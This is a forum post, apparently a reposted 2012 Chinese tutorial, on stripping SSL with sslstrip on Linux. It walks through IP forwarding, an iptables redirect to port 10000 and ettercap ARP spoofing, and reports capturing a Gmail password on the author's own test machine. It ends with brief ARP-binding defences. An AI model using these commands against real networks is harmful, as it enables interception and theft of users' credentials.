设为首页
收藏本站
开启辅助访问
切换到宽版
登录
立即注册
只需一步,快速开始
首页
Portal
论坛
BBS
新鲜出炉
免费列表
联系我们
搜索
搜索
文章
安全
安全
统计
传奇版本
精品软件
传奇工具
水漫金山
传奇教程
福利经验
传奇技术
素材补丁
引擎帮助
网站程序
动画发布
开区工具
站点公告
传奇故事
站点版规
关于报毒
在线工具
违规处里
站点帮助
站务处理
本版
帖子
用户
传奇GM论坛
»
论坛
›
精品版本
›
微端版本
›
linux下利用SSLSTRIP突破SSL嗅探密码及防御
返回列表
发新帖
linux下利用SSLSTRIP突破SSL嗅探密码及防御
[复制链接]
317
|
0
|
2012-4-1 19:16:08
|
显示全部楼层
|
阅读模式
准备工作
下载sslstrip,我们下载的是最新版本?wgethttp://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
访问这里http://www.thoughtcrime.org/software/sslstrip/获得更多帮助
安装:
pythonsetup.pyinstall
开始之前先要打开ip_forword转发,否而会出现一些错误,感兴趣的可以查找相关资料并自行测试…纸上得来终觉浅,屏幕上就更浅了,实践出真知
echo“1”>/proc/sys/net/ipv4/ip_forward
使用Iptables过滤数据包
iptables-tnat-APREROUTING-ptcp–destination-port80-jREDIRECT–to-port10000
通过iptables把所有http数据导入到10000端口,我们用sslstrip监听10000端口,并得到我们想要的数据
参数讲解:-t:命令要操作匹配的表(net这个表表示被查询时遇到了新差生的连接包)
Net表有三个内建的链构成PREROUTING(修改到来的包)、OUTPUT(修改路由之前本地的包)、POSTROUTING(修改准备出去的包)
-A表示在选择的链后加入更多选项
–p指被过滤包的协议
–destination-port80指被过滤包的目的端口是80?-jREDIRECT–to-port10000将80端口的数据跳转到指定端口传输
然后我们使用sslstrip监听10000端口
sslstrip-l10000
利用ettercap进行arp欺骗
前面的视频教程已经讲过ettercap的基本用法在此不赘述
ettercap–T–q–Marp:remote/192.168.1.101///
Ettercap默认就会过滤密码,我们也不需要指定过滤脚本
Ok开始测试
echo“1”>/proc/sys/net/ipv4/ip_forward
iptables-tnat-APREROUTING-ptcp–destination-port80-jREDIRECT–to-port10000
sslstrip-l10000
会在运行的当前目录生成sslstrip.log我们用ettercap不看这个也可以~~~
Arp欺骗开始,我对我的物理机192.168.1.101进行攻击测试
ettercap–T–q–Marp:remote/192.168.1.101///
好的开始了,我登陆gmail看看Ettercap成功截获到了gmail的密码~~~
?这里用ettercap密码非常方便就看到了也可以查看sslstrip的日志文件,也是保存了我们的密码
下面说下防御
Sslstrip的攻击方式是一种中间人攻击,需要进行arp欺骗,所以在设置好浏览器本身安全的基础上,要绑定mac和ip等在网关和本机双向绑定,或者启用arp防火墙对arp攻击进行防御.
*
发帖前要善用
【
论坛搜索
】
功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
返回列表
发新帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
幻想
回复楼主
返回列表
图文推荐
传世1.994天元心法版,啸天虎,副本任务,珍宝阁奖励
2011-06-30
最新烟雨寒雪暴力来袭靓装四连击传奇版本,给力嚣张,傲世青龙(3K引擎)
2011-07-01
新注册会员无法接收到验证邮件问题及解决方法
2011-12-17
2011最新火爆3D真彩地图,1.96梦幻变身QQ三钻黄金皓月升级版(...
2011-06-20
2003复古蓝色飞刀我本沉默,倚天劈地,押镖系统,九绝剑魔(Her...
2012-03-30
热门排行
1
2003复古蓝色飞刀我本沉默,倚天劈地,押镖系统,九绝剑魔(Her...
2
超爽给力3D真彩韩版诸神灭佛中变版,皇冠至尊,天地归一(Her...
3
1.96紫仙刺影四钻元素轻变版,冰神皓月,黄金矿工,紫仙合成(...
4
独家四皇冠《救世主》3D真彩地图中变靓装版,终结者神地(H...
5
2012最新青龍白虎中变皇冠之神靓装版,龙神宝殿,白虎之都(H...
6
1.95龙战刺影神龙合击版,刺影之城,神龙之地,幽冥神盾(3k引擎)
7
New盟重新城暗杀来袭第八季武动乾坤,枯海神舰,斗气大陆(Ma...
8
1.76复古精品加强版,爵位封号,亡灵古墓,夺宝奇兵,精品神殿(Hero引擎)